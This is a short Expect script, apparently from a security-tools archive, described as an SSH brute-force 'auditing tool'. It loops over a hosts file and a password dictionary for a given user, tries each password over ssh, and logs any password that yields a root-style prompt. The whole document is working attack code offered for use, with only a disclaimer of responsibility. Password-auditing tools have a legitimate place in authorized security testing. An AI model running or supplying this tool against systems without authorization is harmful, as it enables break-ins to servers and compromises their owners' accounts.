55hb is a SSH account brute force auditing tool written in expect. Allows you to specify hosts, password lists, and a user.
fb723aa7785e3130278d7ec8ff23e3a0e2b718012bbe3d2bb35b612d4c64a2b8
#!/usr/bin/expect -f
#
# Written by James Shanahan(jshanahan@comcastpc.com)
# ssh brute forcer
# This will alow you to specify hosts, password lists, and a user
# I do not take any reponsibilty for what you do with this tool
# Hopefully it will make your life easier rather then making other
# peoples lifes more difficult!
set timeout 4
set dictionary [lindex $argv 0]
set file [lindex $argv 1]
set user [lindex $argv 2]
if {[llength $argv] != 3} {
puts stderr "Usage: $argv0 <dictionary-file> <hosts-file <user>\n"
exit }
set tryHost [open $file r]
set tryPass [open $dictionary r]
set passwords [read $tryPass]
set hosts [read $tryHost]
foreach ip $hosts {
foreach passwd $passwords {
spawn ssh $user@$ip
expect ":"
send "$passwd\n"
set logFile [open $ip.log a]
expect "#" {
puts $logFile "password for $ip is $passwd\n"
}
set id [exp_pid]
exec kill -INT $id
}
}